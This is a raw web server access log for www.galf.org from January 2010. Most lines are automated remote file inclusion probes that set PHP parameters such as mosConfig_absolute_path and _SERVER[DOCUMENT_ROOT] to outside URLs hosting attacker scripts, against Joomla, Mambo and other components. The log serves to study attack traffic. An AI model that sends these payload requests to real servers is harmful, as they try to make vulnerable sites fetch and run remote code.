87.250.252.242 - - [10/Jan/2010:16:05:23 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 7662334 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:06:21 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:06:21 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:06:21 -0800] "GET /logs/access_090928.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:08:39 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:08:39 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:08:39 -0800] "GET /logs/access_090928.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [10/Jan/2010:16:12:01 -0800] "GET /cendoc/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:16:16:10 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:16:16:15 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
115.100.249.238 - - [10/Jan/2010:16:16:53 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
212.175.5.130 - - [10/Jan/2010:16:19:51 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "galf.org"
212.175.5.130 - - [10/Jan/2010:16:19:51 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://gminamakow.info//dmdocuments/mambo?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:07 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:07 -0800] "GET /logs/access.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:07 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:17 -0800] "GET /logs/access.log%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:17 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:22:17 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:23:00 -0800] "GET /logs/access_091005.log%20%20///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:23:03 -0800] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:23:03 -0800] "GET /logs/access.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:23:03 -0800] "GET /logs///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:34 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:34 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:34 -0800] "GET /logs/access_090928.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [10/Jan/2010:16:23:35 -0800] "GET /logs/access_091005.log///index.php?_SERVER[DOCUMENT_ROOT]=http://www.dscontrol.co.kr/data/members/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:36 -0800] "GET /ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:36 -0800] "GET /logs//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:36 -0800] "GET /logs/access_090928.log%20%20//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:43 -0800] "GET /logs/access_090928.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:44 -0800] "GET /logs/access_090928.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:56 -0800] "GET /logs/access.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:23:56 -0800] "GET /logs/access.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:24:42 -0800] "GET /logs/access_091123.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:24:42 -0800] "GET /logs/access_090921.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:25:08 -0800] "GET /logs/access_091123.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.36.253.32 - - [10/Jan/2010:16:25:11 -0800] "GET /logs/access_090921.log//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.ltwoong.pe.kr:8080/bbs///skin/zina02_orange/com/idx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [10/Jan/2010:16:26:28 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [10/Jan/2010:16:26:28 -0800] "GET /logs/access_091207.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [10/Jan/2010:16:26:28 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.234.2.95 - - [10/Jan/2010:16:26:47 -0800] "GET /logs/access_090817.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:19 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:19 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:23 -0800] "GET /logs/access_091207.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:25 -0800] "GET /logs//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:25 -0800] "GET /index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:36:27 -0800] "GET /logs/access_091207.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:37:13 -0800] "GET /logs/access_090817.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.180.124.135 - - [10/Jan/2010:16:37:18 -0800] "GET /logs/access_090817.log%20%20//index.php?option=com_user&Itemid=&mosConfig.absolute.path=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.24.176.75 - - [10/Jan/2010:16:37:50 -0800] "GET /logs/access_090608.log HTTP/1.1" 404 - "http://megaworld.my1.ru/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
207.46.199.185 - - [10/Jan/2010:16:43:57 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:35 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:35 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:35 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:46 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
189.72.62.107 - - [10/Jan/2010:16:46:47 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
115.100.249.238 - - [10/Jan/2010:16:47:02 -0800] "GET /logs/access_090817.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
66.235.124.132 - - [10/Jan/2010:17:01:24 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "www.galf.org"
66.235.124.132 - - [10/Jan/2010:17:01:24 -0800] "GET /logs/access_090119.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11" "www.galf.org"
115.100.249.238 - - [10/Jan/2010:17:08:23 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
118.223.225.130 - - [10/Jan/2010:17:28:10 -0800] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.223.225.130 - - [10/Jan/2010:17:29:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
118.223.225.130 - - [10/Jan/2010:17:30:56 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
68.109.233.150 - - [10/Jan/2010:17:31:38 -0800] "GET /appserv/main.php?appserv_root=http://lala123.110mb.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [10/Jan/2010:17:31:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://lala123.110mb.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [10/Jan/2010:17:31:41 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://lala123.110mb.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [10/Jan/2010:17:37:20 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 131072 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
115.100.249.238 - - [10/Jan/2010:17:40:47 -0800] "GET /logs/access_091214.log/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
115.100.249.238 - - [10/Jan/2010:17:40:48 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.simplyski.com//bot.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.195.37.161 - - [10/Jan/2010:17:47:50 -0800] "GET /logs/access_090907.log HTTP/1.0" 200 3152962 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:47:50 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:47:50 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:47:50 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:47:50 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:01 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:01 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:01 -0800] "GET /logs/access_090622.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:02 -0800] "GET /logs/access_090831.log%20%20//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:26 -0800] "GET /logs/access_090831.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:42 -0800] "GET /logs/access_090622.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
207.191.225.96 - - [10/Jan/2010:17:48:43 -0800] "GET /logs/access_090831.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.aktivvital.info//administrator/components/com_sh404sef/readme.inc.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:11 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:12 -0800] "GET /logs/access.log%20%20///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:14 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:19 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:19 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:19 -0800] "GET /logs/access_090831.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:21 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:21 -0800] "GET /logs/access_090622.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:21 -0800] "GET /logs/access.log///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:21 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:28 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:28 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:32 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:32 -0800] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:32 -0800] "GET /logs/access_090622.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:32 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:32 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:32 -0800] "GET /logs/access.log%20%20///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:53:33 -0800] "GET /logs/access.log///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.143.84.66 - - [10/Jan/2010:17:53:34 -0800] "GET /logs/access_090831.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.nazca.co.kr/2005/kboard/[data]/data1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:55:16 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:55:16 -0800] "GET /logs/access.log///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:55:19 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:55:54 -0800] "GET //cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.129.166.190 - - [10/Jan/2010:17:55:54 -0800] "GET /logs///cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://www.outdoorbooks.co.kr/menu/tmp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
